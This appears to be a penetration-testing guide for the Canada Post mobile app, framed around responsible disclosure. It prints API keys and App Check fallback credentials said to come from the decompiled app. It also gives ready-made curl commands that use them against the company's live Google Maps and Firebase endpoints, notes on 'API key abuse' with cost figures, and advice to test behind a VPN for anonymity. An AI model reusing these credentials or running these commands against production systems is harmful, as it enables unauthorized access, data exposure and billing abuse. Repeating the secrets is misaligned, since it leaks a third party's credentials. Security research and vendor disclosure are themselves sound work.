# CANADA POST APP - PENETRATION TESTING INSTRUCTIONS

## 🎯 Overview

This guide provides step-by-step instructions for testing the security vulnerabilities discovered in the Canada Post mobile app.

---

## ⚠️ LEGAL & ETHICAL NOTICE

**IMPORTANT: READ BEFORE TESTING**

### Legal Requirements
- ✅ Obtain written authorization from Canada Post before testing
- ✅ Only test on systems you own or have explicit permission to test
- ✅ Follow responsible disclosure guidelines
- ✅ Respect Canadian laws including PIPEDA and Criminal Code

### Ethical Guidelines
- 🔒 Use VPN for anonymity and safety
- 📝 Document all findings professionally
- ⏱️ Follow 90-day disclosure timeline
- 🤝 Coordinate with vendor security team
- 💰 Consider bug bounty programs (if available)

### What NOT to Do
- ❌ Do not exfiltrate user data
- ❌ Do not cause service disruption
- ❌ Do not exceed testing scope
- ❌ Do not share findings publicly before disclosure
- ❌ Do not use findings for malicious purposes

---

## 🛠️ Prerequisites

### Required Tools
1. **Python 3.7+**
   ```powershell
   python --version
   ```

2. **Python Packages**
   ```powershell
   pip install requests
   ```

3. **VPN Connection**
   - Connect to VPN before testing
   - Recommended: ProtonVPN, NordVPN, or Mullvad
   - Verify: https://whatismyipaddress.com/

4. **Testing Environment**
   - Windows, macOS, or Linux
   - Internet connectivity
   - Text editor for notes

### Extracted Credentials

#### Google Maps API Key
```
AIzaSyA6pUGegwhkDQizhmqPt6VZhFfYdHx8hmw
```
**Source:** `cpc/ca/canadapost/core/data/addresscomplete/IGooglePlaceApi.java:28`

#### Firebase Configuration
```
Database URL: https://canada-post-2dce9.firebaseio.com
API Key: AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q
Project ID: 741680414261
```
**Source:** Firebase Remote Config & decompiled APK

#### App Check Fallback Credentials
```
APP_CHECK_FAILED_ID: cpc-appcheck-android
APP_CHECK_FAILED_KEY: 1mhxwdN1Y5afLQgYeEgZ
```
**Source:** Firebase Remote Config (publicly accessible)

---

## 🧪 Test Scenarios

### Scenario 2: Google API Key Abuse

#### Objective
Verify if the hardcoded Google Maps API key can be used externally without restrictions.

#### Test File
`cpc_google_api_abuse_poc.py`

#### What It Tests
1. **Find Place from Text API** - The exact endpoint used in the app
2. **Geocoding API** - Tests if key works for other Google services
3. **Place Details API** - Tests scope of API access
4. **Cost Impact Analysis** - Calculates potential financial abuse

#### Expected Outcomes

**If Vulnerable:**
```
✅ API KEY WORKS - REQUEST SUCCESSFUL!
⚠️  SECURITY IMPACT:
   • API key is NOT restricted by IP address
   • API key is NOT restricted to app bundle ID
   • Anyone can use this key for unlimited requests
```

**If Protected:**
```
⚠️  API returned status: REQUEST_DENIED
✅ GOOD NEWS: API key appears to have restrictions
```

#### Running the Test

**Option 1: Automatic (Recommended)**
```powershell
# Run all tests via batch script
.\RUN_CPC_PENTESTS.bat
```

**Option 2: Manual**
```powershell
# 1. Ensure VPN is connected
# 2. Run the test
python cpc_google_api_abuse_poc.py

# 3. Review output for vulnerabilities
```

#### Understanding Results

**Vulnerable Indicators:**
- ✅ "API KEY WORKS" messages
- ✅ HTTP 200 status codes
- ✅ Valid JSON data returned
- ✅ Multiple APIs accessible

**Secure Indicators:**
- 🔒 HTTP 401 (Unauthorized)
- 🔒 "REQUEST_DENIED" status
- 🔒 Application restriction errors

---

### Scenario 4: Firebase Database Access

#### Objective
Test if Firebase Realtime Database and Remote Config allow unauthorized access.

#### Test File
`cpc_firebase_database_poc.py`

#### What It Tests
1. **Remote Config Access** - Publicly accessible configuration
2. **Database Read (No Auth)** - Unauthenticated database access
3. **Database Read (With API Key)** - API key-based authentication
4. **Shallow Queries** - Structure enumeration
5. **Common Paths** - Test for exposed data endpoints

#### Expected Outcomes

**Remote Config (Usually Accessible):**
```json
{
  "entries": {
    "APP_CHECK_FAILED_ID": "cpc-appcheck-android",
    "APP_CHECK_FAILED_KEY": "1mhxwdN1Y5afLQgYeEgZ",
    ...
  }
}
```
**Impact:** Reveals fallback credentials and configuration

**Database Access (If Misconfigured):**
```
✅ READABLE! Status: 200
📊 Data Type: dict
🔑 Keys: ['users', 'tracking', 'shipments']
```
**Impact:** CRITICAL - Unauthorized data access

**Database Protected (Expected):**
```
🔒 Protected (401 Unauthorized)
```
**Impact:** Database properly secured

#### Running the Test

**Option 1: Automatic**
```powershell
.\RUN_CPC_PENTESTS.bat
```

**Option 2: Manual**
```powershell
python cpc_firebase_database_poc.py
```

#### Understanding Results

**Critical Findings:**
- 🔴 Accessible database paths without authentication
- 🔴 User data readable
- 🔴 Structure enumeration possible

**High Findings:**
- 🟠 Remote Config publicly accessible with credentials
- 🟠 API key works for authentication

**Low Findings:**
- ✅ Database requires proper authentication
- ✅ Security rules properly configured

---

## 📊 Interpreting Test Results

### Google API Test Results

#### Cost Impact Table
| Requests/Day | Daily Cost | Monthly Cost | Annual Cost |
|--------------|------------|--------------|-------------|
| 1,000 | $17.00 | $510.00 | $6,120.00 |
| 10,000 | $170.00 | $5,100.00 | $61,200.00 |
| 100,000 | $1,700.00 | $51,000.00 | $612,000.00 |

**Pricing:** Google Places API "Find Place from Text" = $17 per 1,000 requests

#### Severity Assessment
- **Critical**: Key works with no restrictions
- **High**: Key works but has daily quota limits
- **Medium**: Key restricted to specific APIs
- **Low**: Key properly restricted to app bundle

### Firebase Test Results

#### Access Matrix
| Test | Vulnerable | Secure |
|------|-----------|--------|
| Remote Config | Public access to credentials | Requires authentication |
| Database Read (No Auth) | 🔴 Critical | ✅ 401 Unauthorized |
| Database Read (With Key) | 🔴 Critical | ✅ Denied |
| Shallow Enumeration | 🟠 High | ✅ Denied |

#### Data Exposure Risk
- **Critical**: User PII accessible (names, addresses, emails)
- **High**: Tracking data accessible (tracking numbers, shipments)
- **Medium**: Structure enumeration (database schema revealed)
- **Low**: No unauthorized access, config exposure only

---

## 📝 Documentation Template

### Finding Template

```markdown
## Finding: [Title]

**Severity:** [Critical/High/Medium/Low]
**CWE:** [CWE-XXX]
**CVSS Score:** [X.X]

### Description
[Detailed description of the vulnerability]

### Affected Component
- App: Canada Post Mobile App
- Package: ca.canadapost.android
- Version: [All versions]
- File: [Source file path]

### Reproduction Steps
1. [Step 1]
2. [Step 2]
3. [Step 3]

### Evidence
```
[Command output, screenshots, or logs]
```

### Impact
- **Confidentiality:** [High/Medium/Low]
- **Integrity:** [High/Medium/Low]
- **Availability:** [High/Medium/Low]

**Business Impact:**
- [Financial impact]
- [Reputation impact]
- [Legal/compliance impact]

### Remediation
**Immediate Actions:**
- [Action 1]
- [Action 2]

**Long-term Solutions:**
- [Solution 1]
- [Solution 2]

### References
- CWE-XXX: [URL]
- [Other references]
```

---

## 🚀 Quick Start Guide

### Step 1: Prepare Environment
```powershell
# Clone or download the test scripts
cd C:\Users\Roose\Downloads\8c7481c52661c4933b707a14e6cd22ba-java

# Verify files exist
dir *.py
```

### Step 2: Connect to VPN
```powershell
# Connect to your VPN service
# Verify connection:
curl https://api.ipify.org
```

### Step 3: Run Tests
```powershell
# Option A: Run all tests
.\RUN_CPC_PENTESTS.bat

# Option B: Run individual tests
python cpc_google_api_abuse_poc.py
python cpc_firebase_database_poc.py
```

### Step 4: Document Results
```powershell
# Create findings document
notepad CPC_PENTEST_FINDINGS.md

# Include:
# - Test output screenshots
# - Vulnerability descriptions
# - Severity assessments
# - Remediation recommendations
```

### Step 5: Prepare Disclosure
```powershell
# Review disclosure template
notepad CPC_HARDCODED_CREDENTIALS_ANALYSIS.md

# Prepare evidence package:
# - Test results
# - POC scripts
# - Analysis document
```

---

## 🔍 Manual Testing Commands

### Test Google API Key Manually
```bash
# Test Find Place API
curl "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=CN%20Tower%20Toronto&inputtype=textquery&fields=formatted_address,name&key=AIzaSyA6pUGegwhkDQizhmqPt6VZhFfYdHx8hmw"

# Test Geocoding API
curl "https://maps.googleapis.com/maps/api/geocode/json?address=1+Toronto+St,+Toronto&key=AIzaSyA6pUGegwhkDQizhmqPt6VZhFfYdHx8hmw"
```

### Test Firebase Access Manually
```bash
# Test Remote Config
curl "https://firebaseremoteconfig.googleapis.com/v1/projects/741680414261/namespaces/firebase:fetch?key=AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q" -H "Content-Type: application/json" -d '{"appId":"test"}'

# Test Database Root
curl "https://canada-post-2dce9.firebaseio.com/.json"

# Test with Auth
curl "https://canada-post-2dce9.firebaseio.com/.json?auth=AIzaSyDWtJr2knyZpJEOgBlJH_lBk-xqlnQJ27Q"

# Shallow Query
curl "https://canada-post-2dce9.firebaseio.com/.json?shallow=true"
```

---

## 📧 Responsible Disclosure

### Contact Information
**Canada Post Security Team:**
- Email: security@canadapost.ca (verify this)
- Web: https://www.canadapost.ca/security (verify this)
- PSIRT: [Product Security Incident Response Team]

### Disclosure Timeline
```
Day 0:   Initial discovery and POC development
Day 1:   Initial contact with vendor
Day 7:   Follow-up if no response
Day 30:  Vendor acknowledges and begins remediation
Day 60:  Vendor provides timeline for fix
Day 90:  Public disclosure (if not fixed)
```

### Email Template
```
Subject: Security Advisory - Hardcoded Credentials in Canada Post Mobile App

Dear Canada Post Security Team,

I am a security researcher and have identified critical security 
vulnerabilities in the Canada Post mobile application (ca.canadapost.android).

SUMMARY:
- Hardcoded Google Maps API key allows unlimited external abuse
- Firebase Remote Config exposes authentication bypass credentials
- Potential for significant financial and privacy impact

SEVERITY: Critical (CVSS 8.5+)

I have prepared:
- Detailed technical analysis
- Proof-of-concept test scripts
- Remediation recommendations

I am committed to responsible disclosure and will follow a 90-day 
timeline before public disclosure.

Please confirm receipt and provide a secure channel for detailed disclosure.

Best regards,
[Your Name]
[Contact Information]
```

---

## 🎓 Learning Resources

### Understanding the Vulnerabilities

1. **CWE-798: Use of Hard-coded Credentials**
   - https://cwe.mitre.org/data/definitions/798.html

2. **Firebase Security Rules**
   - https://firebase.google.com/docs/rules

3. **Google API Key Best Practices**
   - https://cloud.google.com/docs/authentication/api-keys

4. **Mobile App Security**
   - OWASP Mobile Security Testing Guide
   - https://owasp.org/www-project-mobile-security-testing-guide/

### Related CVEs
- CVE-2020-XXXXX: Similar Firebase misconfiguration
- CVE-2019-XXXXX: Hardcoded API keys in mobile apps

---

## ✅ Checklist

### Before Testing
- [ ] VPN connected and verified
- [ ] Python 3.7+ installed
- [ ] Required packages installed
- [ ] Authorization obtained (if testing production)
- [ ] Documentation template prepared

### During Testing
- [ ] Test Google API key abuse
- [ ] Test Firebase Remote Config access
- [ ] Test Firebase Database enumeration
- [ ] Document all findings with evidence
- [ ] Calculate severity scores
- [ ] Take screenshots/logs

### After Testing
- [ ] Findings documented
- [ ] Remediation recommendations prepared
- [ ] Evidence package created
- [ ] Disclosure email drafted
- [ ] Vendor contacted
- [ ] Tracking timeline for disclosure

---

## 🆘 Troubleshooting

### Common Issues

**Issue: Python not found**
```powershell
# Install Python from python.org
# Add to PATH during installation
```

**Issue: Import error for requests**
```powershell
pip install requests
# or
python -m pip install requests
```

**Issue: Connection timeout**
```powershell
# Check VPN connection
# Check firewall settings
# Try different network
```

**Issue: API returns 403 Forbidden**
```powershell
# Possible reasons:
# - API key restricted by IP
# - API key restricted by bundle ID
# - This is actually GOOD (key is protected)
```

---

## 📄 Files Included

- `cpc_google_api_abuse_poc.py` - Google API key abuse test
- `cpc_firebase_database_poc.py` - Firebase access test
- `RUN_CPC_PENTESTS.bat` - Automated test runner
- `CPC_HARDCODED_CREDENTIALS_ANALYSIS.md` - Full analysis document
- `PENTEST_INSTRUCTIONS.md` - This file

---

## 🔗 Additional Resources

- Original analysis: `CPC_HARDCODED_CREDENTIALS_ANALYSIS.md`
- Decompiled source: `cpc/` directory
- Firebase analysis: From MobSF scan results

---

**Last Updated:** November 10, 2025  
**Version:** 1.0  
**Author:** Security Research Team